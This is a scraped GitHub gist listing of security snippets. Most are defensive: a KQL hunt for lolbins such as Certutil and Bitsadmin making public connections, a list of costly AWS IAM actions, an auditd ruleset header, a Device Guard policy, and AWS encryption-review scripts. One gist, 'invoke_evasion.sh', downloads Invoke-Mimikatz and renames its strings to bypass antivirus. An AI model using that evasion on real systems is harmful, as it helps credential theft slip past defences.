- How to Build a Successful Information Security Career (Daniel Miessler)
- The First Steps to a Career in Information Security (Errata Security - Marisa Fagan)
- Hiring your first Security Professional (Peerlyst - Dawid Balut)
- How to Start a Career in Cyber security
- How to Get Into Information Security (ISC^2)
- https://www.isc2.org/how-to-get-into-information-security.aspx
alexverboon
/ lolbinsnetworkpublic.kql
Created
May 16, 2021 14:39
Hunt for lolbins connecting to public ip addresses
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Inspiration from https://github.com/jangeisbauer/AdvancedHunting/blob/master/hunt_for_lolbins just changed Processes to Networkevents | |
| // T1218 Living of the land binaries connecting to the internet | |
| // network activities with lolbins | |
| DeviceNetworkEvents | |
| | where RemoteIPType == 'Public' | |
| | where InitiatingProcessFileName contains "Atbroker.exe" or | |
| InitiatingProcessFileName contains "Bash.exe" or | |
| InitiatingProcessFileName contains "Bitsadmin.exe" or | |
| InitiatingProcessFileName contains "Certutil.exe" or | |
| InitiatingProcessFileName contains "Cmdkey.exe" or |
iann0036
/ gist:b473bbb3097c5f4c656ed3d07b4d2222
Last active
January 28, 2025 16:24
List of expensive / long-term effect AWS IAM actions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| route53domains:RegisterDomain | |
| route53domains:RenewDomain | |
| route53domains:TransferDomain | |
| ec2:ModifyReservedInstances | |
| ec2:PurchaseHostReservation | |
| ec2:PurchaseReservedInstancesOffering | |
| ec2:PurchaseScheduledInstances | |
| rds:PurchaseReservedDBInstancesOffering | |
| dynamodb:PurchaseReservedCapacityOfferings | |
| s3:PutObjectRetention |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # IMPORTANT! | |
| # This gist has been transformed into a github repo | |
| # You can find the most recent version there: | |
| # https://github.com/Neo23x0/auditd | |
| # ___ ___ __ __ | |
| # / | __ ______/ (_) /_____/ / | |
| # / /| |/ / / / __ / / __/ __ / | |
| # / ___ / /_/ / /_/ / / /_/ /_/ / | |
| # /_/ |_\__,_/\__,_/_/\__/\__,_/ |
mattifestation
/ BaseEnforcementPolicy.xml
Last active
March 5, 2021 16:31
A Device Guard policy in enforcement mode that just works. It permits execution of only enough to boot the OS, run Windows code, and run Store apps.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy"> | |
| <VersionEx>10.0.0.0</VersionEx> | |
| <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID> | |
| <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID> | |
| <Rules> | |
| <Rule> | |
| <Option>Enabled:Unsigned System Integrity Policy</Option> | |
| </Rule> | |
| <Rule> |
PaulSec
/ invoke_evasion.sh
Created
August 1, 2017 13:50
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # AV Bypass to run Mimikatz | |
| # From: https://www.blackhillsinfosec.com/?p=5555 | |
| # Server side: | |
| wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
| sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 | |
| sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From: http://redteams.net/bookshelf/ | |
| Techie | |
| Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp. | |
| Social Engineering: The Art of Human Hacking by Christopher Hadnagy | |
| Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam | |
| The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick | |
| Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others. | |
| Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor | |
| The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors |
cktricky
/ list_monitoring_configuration.py
Created
January 30, 2017 00:58
List Configuration of Monitoring Services in AWS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import boto3 | |
| import pprint | |
| pp = pprint.PrettyPrinter(indent=5, width=80, compact=False) | |
| #http://docs.aws.amazon.com/general/latest/gr/rande.html | |
| regions = ['us-east-1', 'us-west-2', 'ap-northeast-2', 'ap-southeast-1', 'ap-southeast-2', 'ap-northeast-1', 'eu-central-1', 'eu-west-1'] | |
| ''' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import boto3 | |
| import pprint | |
| # MAKE SURE YOU CHANGE THESE VALUES OR THE TOOL WON'T WORK. | |
| access_key_id = 'replace me' | |
| secret_access_key = 'replace me' | |
| ''' | |
| WORK IN PROGRESS, NOT COMPLETED | |
| This file is used to review s3 bucket permissions and whether or not they are encrypted |
cktricky
/ review_encrypted_volumes.py
Created
January 25, 2017 17:08
Evaluate EBS Volumes Encryption Status
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import boto3 | |
| import pprint | |
| # MAKE SURE YOU CHANGE THESE VALUES OR THE TOOL WON'T WORK. | |
| access_key_id = 'replace me' | |
| secret_access_key = 'replace me' | |
| ''' | |
| This file is used to list EBS volumes and whether or not they are encrypted. This is only for "in-use" (running) volumes. |
NewerOlder